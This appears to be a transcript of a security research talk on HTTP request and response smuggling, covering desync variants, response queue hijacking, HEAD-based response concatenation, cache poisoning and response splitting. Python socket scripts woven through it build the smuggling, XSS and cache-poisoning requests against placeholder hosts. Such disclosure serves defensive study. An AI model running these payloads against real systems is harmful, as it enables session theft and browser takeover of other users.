Hello, my name is Martín Dalinar. I'm a security researcher at Anapsis Labs, and today I'm going to present a new set of techniques that can be used to obtain control over the response queue of a persistent connection by exploiting different HTTP desynchronization vulnerabilities.

The agenda for today: first I'm going to make a quick recap on HTTP request smuggling, and even though I expect most of you already know what request smuggling is, I'm still going to make a quick introduction. I will also talk about desynchronization variants, and about one in particular that will be used through the rest of the presentation for both demos and examples. After this introduction, I'm going to explain what response smuggling is and how to use it for different malicious purposes, and I will show how to hijack responses and requests from a persistent connection and how to obtain reliable results in real systems. Next, I'm going to demonstrate how to concatenate multiple responses and build malicious payloads to take control over the victim's browser, and, using this, how to poison the web cache of an HTTP proxy by storing an arbitrary message as the response of any endpoint the attacker wants. Finally, I'll explain how to split responses and inject arbitrary messages that will be stored in the response queue and delivered back to other clients by the proxy.

So, request smuggling is an attack introduced in 2005 by Watchfire which abuses the differences between a frontend and a backend server. These differences are related to the way each HTTP parser calculates the body length of a request. The idea is that the attacker sends a request containing multiple message-length headers, such as Content-Length or Transfer-Encoding, and if the frontend calculates the length of the body using a different header than the backend, it will be possible to split the request and inject a prefix for the next message.

Let's see an example of this in which two Content-Length headers are sent in the same request. In this example the proxy will only use the first Content-Length if multiple headers with the same name are sent, and the backend will instead only use the last Content-Length to calculate the body size. When the attacker sends this request, the frontend will forward the entire message, as it will think that the body is 32 bytes long. However, when this message reaches the backend, only the first 5 bytes of the body will be considered part of the request. The extra 27 bytes will be split off and used as the prefix of the next request processed by the backend. If a victim's request arrives after the attacker's one, it will be concatenated to the injected prefix, causing the backend to believe that the victim issued a request to the delete-account endpoint when it actually issued one to the my-account endpoint, and as the victim's session cookies are also included, the application will probably delete his account. But also, the response to this request will be sent back to the victim, and if it contains any malicious payload, such as JavaScript, it will be executed on the client's browser as well.

These attacks were forgotten for many years, as it was thought that they couldn't be used in real systems, but this changed in 2019 when James Kettle revived this idea by providing a new methodology: first detect different desynchronization primitives, then confirm that it is possible to use them to smuggle a request, and finally explore and exploit the different features provided by the application.
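As a rough sketch, not part of the original demo, the double Content-Length request from this example could be put together like this in Python with raw sockets. The host names, the search and delete-account paths, and the exact frontend/backend behavior (first versus last Content-Length) are assumptions taken from the example above.

```python
import socket

HOST, PORT = "proxy.example.com", 80   # hypothetical vulnerable frontend

# Unterminated header at the end ("X: ") so the victim's request line is
# absorbed into a harmless header while their Cookie header stays intact.
prefix = b"GET /delete_account HTTP/1.1\r\nX: "

body = b"AAAAA" + prefix   # 5 bytes the backend keeps, plus the smuggled prefix

request = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    # The frontend honours the FIRST Content-Length and forwards everything.
    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    # The backend honours the LAST Content-Length and reads only 5 bytes,
    # leaving the prefix in its buffer as the start of the "next" request.
    b"Content-Length: 5\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n" + body
)

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(request)
    print(s.recv(4096).decode(errors="replace"))
```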
What's more, he was able to demonstrate that these techniques could be applied to many real systems, and it was possible to collect a lot of bounties from different vendors. Also, in 2019 and 2020, many desynchronization variants were presented by researchers. These are techniques that can be used to force a discrepancy between servers by hiding message-length headers, such as the Content-Length, from a specific parser. In most cases this is done by placing extra special characters, such as a space or a non-printable character, so that one server fails to recognize the header name or its value as a valid message-length header.

But even though these flaws can be found in many parsers, it is also possible to cause a desynchronization by using a feature provided by the HTTP protocol itself. To understand this technique, first I'll explain the difference between an end-to-end and a hop-by-hop header. End-to-end headers are those that are intended to travel from the client to the backend server and be forwarded by any proxy in the middle. On the other hand, hop-by-hop headers are intended to travel only to the next node in the communication chain, and for this reason proxies must not forward these headers and should remove them from the request before it is forwarded. One of the most interesting hop-by-hop headers defined in the HTTP RFC is the Connection header. This directive can be used to specify connection options that are used to establish and maintain a connection between two nodes. These options must not affect other connections, so again, they should not be forwarded by any proxy receiving them. Some well-known connection options are close and keep-alive, but the protocol also allows the client to declare any custom value he wants, and it allows that connection option to appear as an extra header giving the proxy or the servers more information on how to persist the TCP communication.

So let's see an example of a request containing two connection options. First the client declares them as values of the Connection header, and then the two options are also declared as separate headers. When a proxy forwards this request, it will remove both the option header and the keep-alive header, as well as all the Connection directives. But what if, instead of specifying some useless value as a connection option, we declared an end-to-end header such as the Content-Length? When the proxy receives the request, it will consider the body to be 13 bytes and it will forward it, but before it does, it will remove the Content-Length header, as it was declared as a connection option. So when the backend receives this, it will think that the body is empty and it will split the message. This will cause the smuggled data to be used as the prefix of the next arriving request.

This issue was reported under Google's vulnerability reward program, and Google fixed it and confirmed that it was possible to use it to smuggle requests on all their public domains. Now let's see how these desynchronization primitives can be leveraged to produce useful exploits in web applications. First, we could use request smuggling to bypass frontend controls, such as filters on forbidden endpoints, and this can be done by smuggling the forbidden request, which will not be seen by the proxy and will be forwarded to the backend.
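A minimal sketch of the Connection-header variant just described, with hypothetical host and path names, and assuming a frontend that strips any header listed in Connection after using it to parse the message:

```python
import socket

HOST, PORT = "proxy.example.com", 80   # hypothetical vulnerable frontend

smuggled = b"GET /admin HTTP/1.1\r\nX: "   # hypothetical prefix for the next request

request = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    # Listing Content-Length as a connection option makes the frontend treat
    # it as hop-by-hop: it uses it to read the body, forwards the whole
    # message, but strips the header before passing the request on.
    b"Connection: keep-alive, Content-Length\r\n"
    b"Content-Length: " + str(len(smuggled)).encode() + b"\r\n"
    b"\r\n" + smuggled   # the backend sees no Content-Length and an "empty" body
)

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(request)
    print(s.recv(4096).decode(errors="replace"))
```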
However, this technique does not bypass authentication for most resources, and in most real applications it will fail if the response is not received by the attacker or if the filter is not placed in the vulnerable proxy. Another classic technique is hijacking a victim's request, but this can only be done if the web application offers some data storage feature; that is, the attacker can only hijack victim information if it can be stored and retrieved, which is not that common in all applications, and these kinds of features are in most cases only offered to authenticated users, so the attacker will need a valid account or a valid session. Next, we could use request smuggling to upgrade existing vulnerabilities such as cross-site scripting: the attacker will be able to distribute the payload without having to interact with the victim, and will not have to force the client to trigger the attack by performing some action. The same idea can be applied to any vulnerability requiring interaction, such as an open redirect, but to improve this kind of vulnerability the attacker first needs to find another vulnerability, such as the cross-site scripting, because otherwise there is nothing to be upgraded. Finally, desynchronization vulnerabilities can be used to perform different web cache attacks, such as web cache poisoning, and this can be done by modifying the response of a cacheable resource by applying a prefix to the backend's request. However, it is only possible to poison resources that were already cacheable, and only if the proxy ignores the Cache-Control header; if this is not the case, then the malicious response will not be stored by the web cache and the attack will fail. Some other techniques might also be possible, but in most cases they require that the system provides some rather uncommon features or has other vulnerabilities, so I'm not going to talk about them.

So far, all these attacks rely on injecting a prefix into the request queue of a persistent connection; however, exploiting this might not be as trivial as you would like. There are many prerequisites to successfully take advantage of these vulnerabilities, so we would like to look for other options. But what if, instead of placing the focus on the requests, we looked at attacks affecting the response queue of the connection? With this in mind, I started thinking about what would happen if, instead of injecting a prefix for the next message, we smuggled a complete request that will, on its own, produce an extra response. If this happens, the proxy will issue one request but it will receive two different responses from the backend, and if a victim later sends another message to the proxy, it will be forwarded, but in this case the remaining extra response, which corresponds to the smuggled request, will be sent back to the victim. As the victim's response got desynchronized, the attacker can then send another request to hijack the orphaned response, and if this response was issued after a login message, for example, then the attacker will be able to receive sensitive information such as the session cookies or any other session token that was intended for the victim.
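Here is a minimal sketch of that idea, reusing the Connection-header primitive from before to smuggle one complete request so that the backend produces an extra response. Again, the host and paths are hypothetical, and the primitive is an assumption; in a real system it would be whatever variant the frontend/backend pair is vulnerable to.

```python
import socket

HOST, PORT = "proxy.example.com", 80   # hypothetical vulnerable frontend

# A COMPLETE smuggled request: the backend answers it on its own, so the
# backend ends up returning two responses for the one request the proxy saw.
smuggled = (
    b"GET /anything HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
)

attack = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"Connection: keep-alive, Content-Length\r\n"   # hide the body from the backend
    b"Content-Length: " + str(len(smuggled)).encode() + b"\r\n"
    b"\r\n" + smuggled
)

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(attack)
    # Only the first response belongs to this request; the extra one stays
    # queued on the backend connection and gets matched to whatever the
    # proxy forwards next.
    print(s.recv(4096).decode(errors="replace"))
```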
To better understand this technique, let's see how requests and responses are associated at the proxy and at the backend. First, both the attacker and the victim send a request to the frontend; these are stored in the request queue and forwarded to the backend server through the same connection. However, when the malicious payload reaches the backend, it gets split, producing two different responses, and now all three responses (the two generated for the attacker and the one generated for the victim) go back to the proxy. Here, the first response will be forwarded to the attacker, and the second one, which corresponds to the smuggled message, will be forwarded to the victim. But as the proxy only issued two requests, it will wait for a new message before it can forward the last response. In this case, if the attacker is able to send a new message, he will end up obtaining the victim's response, and with it some sensitive information, for example the session cookies that were created after a login request, as we already said.

But if we try to use these techniques in real systems, we will find that the results we obtain are not as expected, and the reliability of these attacks can make us think that they are not as useful as they sound. Here we can see the communication between a proxy and a backend; in this capture an attacker was trying to desynchronize the response queue, but each time a request was sent, the connection was closed by the proxy. This means that the attack is failing, and the reason is that the proxy resets the connection every time it receives an extra response; therefore, we cannot send extra responses before the proxy issues a new request. Only after about a thousand requests was I able to smuggle a single response and actually hijack a victim's message. Of course this is not the desired or expected result, so why is this happening? To understand it, let's take a look at what is going on under the hood, and to do so I will explain one concept that was introduced in HTTP/1.1 and on which all the desynchronization attacks rely.
First, remember that the biggest change between HTTP/1.0 and 1.1 is the ability to persist TCP connections and to send multiple request and response pairs through the same connection. This means that the client is not forced anymore to close the connection after receiving a response; instead, it can use it to send more messages, increasing the performance of the network. However, this concept is sometimes confused with another important feature provided by the HTTP protocol, which is the ability to pipeline different messages through the same connection. HTTP pipelining is what allows a client to send multiple requests without having to wait for the previous responses. This means that if a client needs to send, let's say, two requests to the same server, this can be done at the same time, concatenating them through the same channel, and it is the job of the server or the proxy to split them and resolve each one, producing their corresponding responses. As we saw in previous examples, the way each request is matched with each response depends only on the order in which they were received and forwarded: the first response will correspond to the first request, following a first-in, first-out scheme. That's why we call them request and response queues, because they actually work as queues; there is no other way of matching responses and requests, such as an ID, so the only way to do it is by the order in which they were issued and received.

But here's the catch: most proxies won't enforce pipelining, meaning that if two or more requests from different sources reach the proxy, they won't be concatenated together and they won't be forwarded together to the backend server. Instead, they will be sent through different, free TCP connections, which won't affect each other, so the attacker won't be able to play with the connection queue of the victim, and this prevents the attack. Also, future client requests reaching the server won't go through the same connection that the attacker used previously, and this is because the extra response injected by the attacker is interpreted by the proxy as a communication error: the proxy did not issue any new request, so it shouldn't be receiving any extra response. If this happens, the proxy will think that there is a problem in the communication and will just close the connection, and when closing this connection, the extra response that was received will be discarded, so it won't affect any future requests.

So what can an attacker do to solve this problem? To hijack a response, the attacker needs the backend to send back two responses, but they cannot go back together to the proxy, because, as we saw, in that case the proxy will see an extra response and close the connection. To avoid this, a new request must be forwarded by the proxy so that, when the extra response arrives, the connection is persisted. But this new request can only be forwarded after the first response goes back to the proxy, because the proxy won't forward any other request through the same connection until the request queue of that connection is free. So the idea is to send a time-consuming request as the smuggled message: this request will take some time to be processed, and the server will take some time to generate a response for it.
That processing time will be just enough for the next victim's message to reach the proxy and enter the proxy's request queue. Therefore, when the slow response is forwarded back, it will be sent to that client, and the attacker will now be able to send a fast request and hijack the extra response, which in this case is the response that was issued for the victim. It is not necessary that the sleep request takes a lot of time; it is just about knowing this time and calculating the transmission times to play with them. This allows an attacker to know the best delay between payloads and the best time he has to wait before sending the next attack. Under normal conditions, using different proxies and backend servers, I was able to observe huge improvements: I could actually see how these requests were being smuggled while the connection was persisted, and, as you can see, the same attack using a different smuggled endpoint gives much better results. In this case the connection was persisted for 14 requests, which means that the responses were desynchronized for 14 clients, and that is a really good number if we remember that before we were only getting one out of a thousand.

Now, if we are able to inject complete requests that produce an extra response, what stops us from injecting multiple messages? From a technical perspective it's the same to smuggle one, two or ten requests that will produce one, two or ten extra responses, and this will be useful for other, more complex exploits. But for now, there are some simpler attacks that we can perform and leverage from these techniques. First, it is possible to inject multiple nested responses to effectively distribute our payloads, such as JavaScript using a reflected cross-site scripting: as we already saw, if instead of one we send many different smuggled requests producing this payload, then we will be able to poison the next N clients. Also, nested requests can be used to consume resources from both the backend and the frontend server: as one request can produce multiple messages that need to be processed at the backend, this could consume a lot of CPU time, and as the responses must also be generated, and in some cases stored, this could also affect the memory buffers of the application.
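Going back to the timing idea from a moment ago, here is a minimal sketch of the calibrated hijack, again in Python over raw sockets. The slow endpoint, the host names, and the measured delay are all assumptions, and the sketch presumes the proxy reuses the same backend connection for the attacker's second request.

```python
import socket
import time

HOST, PORT = "proxy.example.com", 80      # hypothetical vulnerable frontend
PROCESSING_DELAY = 2.0                    # measured time the slow endpoint takes

# Complete smuggled request to a slow resource: its pending response keeps
# the backend connection "owed one response" long enough for a victim
# request to be queued behind it.
slow = (
    b"GET /slow-endpoint HTTP/1.1\r\n"    # hypothetical time-consuming resource
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
)

attack = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"Connection: keep-alive, Content-Length\r\n"
    b"Content-Length: " + str(len(slow)).encode() + b"\r\n"
    b"\r\n" + slow
)

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(attack)
    print(s.recv(4096).decode(errors="replace"))   # response to the wrapper request

# Wait roughly as long as the slow endpoint needs, so that a victim request
# is forwarded while its response is still pending, then race in with a
# fast request: the proxy hands us the next response in the queue, which is
# the one generated for the victim.
time.sleep(PROCESSING_DELAY)
with socket.create_connection((HOST, PORT)) as s2:
    s2.sendall(b"GET / HTTP/1.1\r\nHost: vulnerable.example.com\r\n\r\n")
    print(s2.recv(8192).decode(errors="replace"))
```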
But we can also combine nested injection with a classic request smuggling attack. If an application with a desynchronization vulnerability allows some content reflection, even if the reflected parameter is properly encoded, it is possible to hijack a request from the victim instead of only a response. This is done by smuggling two different messages: the first one is the sleep request we already saw, whose only purpose is to desynchronize the response queue, just as we explained previously; the second smuggled request will not be complete, and it will try to reflect some data that is concatenated to it. This is done, as in any other request smuggling attack, by using a Content-Length that is greater than the body of the request. As always, the first response will be sent back to the attacker, and this allows the new victim's request to arrive at the backend, because otherwise, as we saw, the proxy won't forward the request through the poisoned connection. After this, the sleep request gets resolved and its response is forwarded to the victim. Now, since the last smuggled request contained a large Content-Length, it will use the victim's request as part of its body, but it will still need more data; and as the connection is idle, the attacker can now send a large request that completes the body, causing the response containing the victim's request as reflected data to be sent back to the attacker.

After seeing this work in a real system I was kind of excited, but then I started wondering: is it possible to also confuse the HTTP parser when responses are sent back? Of course, we could try the same tricks as with the desync variants, but for that we would need to control the message-length headers of the response, and that is probably not going to happen. However, I also started thinking: is there a difference in how the length of the body is calculated between requests and responses? The answer given by the HTTP RFC is yes. The difference is that for some specific responses the body must always be empty: responses with some special status codes, like 204 and 304, but also responses generated from a HEAD request. What makes this kind of response so interesting is not only that it depends on the request that generated it, but that its headers must be an exact replica of the headers of the corresponding GET response. So when a HEAD response is generated, the only difference from a GET response for the same endpoint is that the body will not be there, but the rest of the headers should be the same, and this of course includes the Content-Length. Even though the Content-Length header is optional, it does appear in most real applications, and if it appears, its value will not be zero when the corresponding GET response contains a body; it will carry the same value, hoping that the proxy knows that this response is special and that its Content-Length should be ignored because it is the response to a HEAD request. But what happens if the proxy fails to match this response with the HEAD request that generated it? Of course, the Content-Length will be used, and it will indicate a wrong value, because the HEAD response contains no body and a Content-Length header with a value different from zero. This desynchronization will cause requests and responses to not be properly matched by the proxy, and it becomes possible to use a smuggled HEAD request to generate a malicious response whose Content-Length header will, in this case, be considered to contain the actual size of the body.

So, if an attacker smuggles two requests to the backend, the first response, which corresponds to the carrier message, will go back to him. Next, another request will arrive at the proxy and it will be forwarded to the backend. Now the backend will send its first queued response, which in this case belongs to a HEAD request. When this message is received by the proxy, it won't be forwarded right away: the Content-Length header states that the body is not empty, and the request matched with this response used a method other than HEAD. This means that, even though the body of the response is empty, the Content-Length states that it shouldn't be, so the proxy will wait for more data before forwarding this response.
So when the next response arrives at the proxy, it will be used as part of the body of the previous message, and this will now be delivered back to the client that issued the second request. Also, the remaining bytes of that response will be sent back to the next client issuing a request, but only if the proxy thinks they are a valid HTTP message, which in this case they are not.

To understand these ideas, let's see how the different HTTP messages travel through the connection. First, the attacker sends his request to the proxy, which forwards it to the backend server. There, the message is split in three, and the first response is sent back to the attacker, as always. After this, the victim issues a new request, in this case a GET request, but it could be any other method except HEAD. This request is also forwarded to the backend server, and when the two pending responses arrive at the proxy, they are concatenated together and sent back to the victim. If the remainder of the split response is not a valid response, then the connection will be closed and the extra response will be discarded, because the proxy will again think that there was a communication error.

But why would it be useful to concatenate multiple responses? We were already able to control the response queue and the responses that the victim receives, so anything we can concatenate we could also have sent with a single request, right? Well, not really, and this is because when we concatenate two responses, one of them will have its headers used as the body of the previous message. This means that if data is reflected in headers, which is rather common in most applications (think of a redirect, or anything that allows an attacker to reflect some data in the headers of the response), then the attacker will be able to reflect it in the body of a response. And if the headers of the first response contain a specific Content-Type directive such as text/html, then this reflected content that was present in the headers will now be treated as HTML data, which allows an attacker to inject, let's say, a malicious cross-site scripting payload or any HTML tag he desires, and of course this will be executed in the client's browser. The same applies to any parameter reflected in a response with a non-HTML content type: if we are able to reflect some content in, let's say, a plain-text response, then we can convert it to another content type by using a different response's headers to change the way the body is interpreted. And of course, this effect can be combined with other techniques to reflect other requests and responses in the message body.
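A minimal sketch of what this HEAD-based concatenation could look like from the attacker's side, again assuming the Connection-header primitive, a hypothetical static page whose GET response is text/html with a non-zero Content-Length, and a hypothetical redirect endpoint that reflects its query string in the Location header (the payload is left unencoded for readability):

```python
import socket

HOST, PORT = "proxy.example.com", 80   # hypothetical vulnerable frontend

# Smuggled request 1: HEAD of a page whose GET twin is text/html with a
# non-zero Content-Length; the HEAD response repeats those headers but
# carries no body.
head_req = (
    b"HEAD /static-page HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
)

# Smuggled request 2: a redirect that reflects its query string in the
# Location header; its status line and headers will be read as the "body"
# of the HEAD response.
payload = b"<script>alert(document.domain)</script>"
reflect_req = (
    b"GET /redirect?url=" + payload + b" HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
)

smuggled = head_req + reflect_req

attack = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"Connection: keep-alive, Content-Length\r\n"   # same desync primitive as before
    b"Content-Length: " + str(len(smuggled)).encode() + b"\r\n"
    b"\r\n" + smuggled
)

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(attack)
    print(s.recv(4096).decode(errors="replace"))   # response 1 comes back to us
# The next client's request is answered with the header-only HEAD response;
# the proxy then reads the redirect, reflected payload included, as its
# text/html body.
```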
So now we'll see a demo. I was able to prove all these techniques against three major vendors, but unfortunately they were not able to fix the issues at the time of this presentation, so to work around that I deployed a small testing lab using a Varnish web cache as the frontend and the latest version of nginx as the backend server. In this case the Varnish HTTP parser is vulnerable to the desync variant I explained previously, the Connection-header variant, so it is possible to smuggle a request using the Connection header to hide the Content-Length. First, we can see that the web application consists of three endpoints, all with almost static responses: the home page, the hello-smuggler endpoint, and any other path, which redirects to the home page. In the preview window, if I send the hello-smuggler request with the GET method, we can see that the response contains a Content-Length greater than zero and a Content-Type header saying that the body should be treated as an HTML document. The same headers, with the same values, are obtained if a HEAD request is sent, just as expected from the HTTP RFC specification. We can also see that the redirect feature reflects the query string in the Location header; this is what will be used to place the malicious JavaScript and hijack the victim's browser.

Now, using Turbo Intruder, which is another great contribution from James Kettle, I will smuggle the requests that build the concatenated response, which will be sent back to the victim. Also consider that this demo was built using the same features found in all three mentioned vendors, so this applies to many real systems and can be found in almost any environment. You can see that once the attack is started, all following victim requests obtain the malicious response, and whenever any request is sent from the browser, this JavaScript is executed; this will happen every time we request anything in the system. Finally, if the attacker stops sending the malicious payload, the desynchronization concludes and the user will see that the application works as expected.

Still, this attack gets even worse when a web cache is available. Remember that classic request smuggling could be used to poison certain endpoints with other existing responses; well, with response smuggling those restrictions are gone, and the attacker will be able to poison any endpoint he wants. The response used to poison the endpoint just needs the HEAD response to contain a Cache-Control header, which will cause the message to be stored in the cache. And as the attacker can send multiple pipelined requests, it is possible to poison the cache with a single payload, which will also be split by the proxy, causing the second request's cache entry to be poisoned with the response of the smuggled message. As an example, let's see what happens when an attacker smuggles a HEAD request for a cacheable resource. As usual, the proxy will send the first response back to the attacker. Next, it will concatenate the HEAD response, which carries the Cache-Control header telling the web cache to store this response, with the second smuggled response, in this case containing the malicious JavaScript. Finally, the next request, which was also issued by the attacker, will be answered with this concatenated message, which will force the web cache to store it for future requests. So when a client requests the same resource that the attacker specified, the malicious response will be sent back without the need for any extra action, because it is stored in the cache for that specific resource.

I believe it will help to see this in the following diagram. As I said, the attacker sends two pipelined requests: one contains the smuggled payload, and the other specifies the URL that will be poisoned; this can be any endpoint the attacker wants, and even non-existing endpoints will work. The requests get split by the proxy and forwarded to the backend server, and as you can see, the messages are pipelined from the same source, so this will work even if pipelining is not enforced or even allowed; in that case the requests will still be queued on the same connection.
The only difference is that they will be sent consecutively rather than concatenated. Now the backend server will again split the messages and produce four isolated responses that are returned to the proxy. Here, both responses will go back to the attacker, but the second one will also be stored in the cache for the endpoint indicated in the second pipelined request: the second request that the proxy was able to recognize is used as the key under which this response gets stored. This way, when a victim issues a request for the same endpoint that the attacker specified, the proxy will find a match with this key in its cache table and return the stored response, and in this case the malicious payload with the JavaScript that the attacker injected will be sent back to the victim.

Remember that this technique can be used every time a web cache exists, as there are no extra requirements: even if the Cache-Control header is not used, there will be at least one URL that can be used to start poisoning the cache with malicious responses, as long as there is a web cache in any proxy of the communication chain. The same technique can be used to force victims into storing their own responses in the cache: if a response contains sensitive victim data, it will be placed in the cache, and later an attacker can access it by requesting the same endpoint that the victim requested. This is known as web cache deception, and in this case it can even be used to store dynamic responses, such as those issued from login requests, which will contain, among other data, session cookies or any other token that the victim receives in his response. So again, the attacker can use this to store anything, and it works as an improved cache deception attack because, as I said, dynamic information can now be stored.
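The two pipelined requests could be put together like this; a rough sketch assuming the same hypothetical cacheable page, redirect reflection, and Connection-header primitive as before, with the poisoned URL chosen arbitrarily:

```python
import socket

HOST, PORT = "proxy.example.com", 80   # hypothetical caching frontend

payload = b"<script>alert(document.domain)</script>"

# Smuggled pair: HEAD of a cacheable page (its GET twin carries Cache-Control
# and a non-zero Content-Length) plus a redirect reflecting our payload.
smuggled = (
    b"HEAD /cacheable HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
    b"GET /redirect?url=" + payload + b" HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
)

wrapper = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"Connection: keep-alive, Content-Length\r\n"
    b"Content-Length: " + str(len(smuggled)).encode() + b"\r\n"
    b"\r\n" + smuggled
)

# Second pipelined request: the URL whose cache entry we want to poison.
# The proxy matches the concatenated HEAD+payload response to this key.
target = (
    b"GET /any/endpoint/we/want HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
)

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(wrapper + target)
    print(s.recv(8192).decode(errors="replace"))
```

Because both requests come from the attacker's own connection, no downstream pipelining support is needed; the proxy just queues them on the same backend connection.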
Now, for the second demo, I will use the same lab as in the previous example, but this time with a new endpoint that is cacheable; in this case it is literally called cacheable, and it is linked from the home page. As you can see, this is also a static resource, but this time the Cache-Control header is used to indicate that the response to this request should be stored by the web cache. In this attack I will attempt to poison the hello-smuggler endpoint to return a malicious script, using the same redirect URL to inject the payload into the body of the HEAD response, as we already saw in the previous example. However, this time the HEAD response will contain the cache directive, which will cause the resulting response to be stored for any endpoint the attacker wants. The same vulnerability will be leveraged to smuggle the responses, and a request for the endpoint to be poisoned will be placed, by pipelining, after the malicious one; so the last request that we are seeing is actually the request whose cache entry will be poisoned. Once this request is sent, the hello-smuggler endpoint gets poisoned, and all following requests receive the response containing the JavaScript injected by the attacker. This causes the browser to execute an eval function that opens another message box, and the same effect can be caused on any endpoint the attacker wants. So the same test is performed against the home path: again the URL gets poisoned, and every time a victim requests this resource, the JavaScript is retrieved and executed, opening another box and showing that the attack was successful.

Finally, the last exploitation technique involves using the remaining bytes of the split response as another extra message that will also be placed in the response queue. Exploiting this behavior is almost the same as exploiting HTTP response splitting vulnerabilities, such as those obtained from line-break header injections: in those cases, an attacker splits a response using some reflection in a header name or value that allows him to place extra line breaks and control the boundaries of the headers. In this case, the idea is to use the HEAD message to split a response that reflects data in its body rather than in its headers, and it must be possible to include line-break characters in this reflected data in order to build a valid HTTP response. This behavior is not that rare for data reflected inside the body, as there is no vulnerability associated with it on its own; the same is not true for line-break reflection in headers, which is why it is so rare to find classic HTTP response splitting vulnerabilities in the wild. So again, the first, non-smuggled response goes back to the attacker, as in previous examples, and the following request arriving at the proxy is forwarded through the same connection. The backend sends back both smuggled responses, and they are concatenated at the proxy, which forwards the first message to the client that issued the last request. Then, since in this case the remaining bytes are also a valid HTTP response, they will be forwarded to the next client that sends a request to the proxy, and if the attacker was able to reflect the line breaks, it will be possible to serve any arbitrary response, controlling both the headers and the body of the message. However, this attack is not that easy to perform, because it requires that the proxy either stores the response or that pipelining is allowed, and even enforced if no web cache is available; that's why this kind of technique is hard to exploit, and why it is not that easy to actually exploit HTTP response splitting vulnerabilities.
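For completeness, here is a rough sketch of how such a split could be attempted, assuming a hypothetical endpoint that URL-decodes a parameter and reflects it, line breaks included, in the response body; in practice the lengths would have to be aligned so that the leftover bytes start exactly at the reflected fake response, which is the hard part and is omitted here:

```python
import socket
from urllib.parse import quote

HOST, PORT = "proxy.example.com", 80   # hypothetical vulnerable frontend

# A complete attacker-built HTTP response that some endpoint reflects
# verbatim in its body (line breaks must survive the reflection).
fake_response = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 25\r\n"
    b"\r\n"
    b"<script>alert(1)</script>"
)

smuggled = (
    # HEAD response used to swallow only part of the next response, so the
    # reflected bytes are left over as a standalone message in the queue.
    b"HEAD /static-page HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
    # Hypothetical endpoint that URL-decodes and reflects the parameter.
    b"GET /reflect?data=" + quote(fake_response).encode() + b" HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"\r\n"
)

wrapper = (
    b"POST / HTTP/1.1\r\n"
    b"Host: vulnerable.example.com\r\n"
    b"Connection: keep-alive, Content-Length\r\n"
    b"Content-Length: " + str(len(smuggled)).encode() + b"\r\n"
    b"\r\n" + smuggled
)

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(wrapper)
    print(s.recv(4096).decode(errors="replace"))
# If the offsets line up, the bytes left over after the HEAD-sized "body"
# form a valid response of the attacker's own making, which the proxy
# queues and serves to the next client request on this connection.
```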
So, some conclusions to finish. First, we can say that response smuggling does not rely on extra vulnerabilities or special conditions to work; most of the requirements of the techniques explained here rely on features that the HTTP protocol itself offers. What's more, almost no exploration phase is required, and the attacks presented in this talk can work with only a few static endpoints, such as the ones I showed in the demo. Also, response smuggling allows an attacker to hijack both requests and responses, in all cases fully compromising the confidentiality of the application. Next, using nested injections and arbitrary cache poisoning, it is possible to prevent users from obtaining valid responses from the web application, either by exhausting the resources of the server or by storing malicious payloads that replace valid endpoints. What's more, response concatenation and splitting, as well as classic request smuggling, can be used to modify and control the request and response queues of a persistent connection; this completely compromises the integrity of the connection queues and of the web application itself. Also, client browsers can be controlled using arbitrary JavaScript when response injection is possible or when the web cache of a proxy is enabled. And finally, with a detailed analysis of the transmission and processing times, it is possible to increase the reliability of the attack and obtain these results with just a few malicious requests. All this should be enough for vendors to once and for all understand that a desynchronization vulnerability, just by itself, should be seen as one of the most critical web vulnerabilities that a system can have.

Now I will answer any questions that you might have, and you can also send me any question or doubt, or if you would like to talk about this subject, you can reach me through my email or through my Twitter account. Thank you.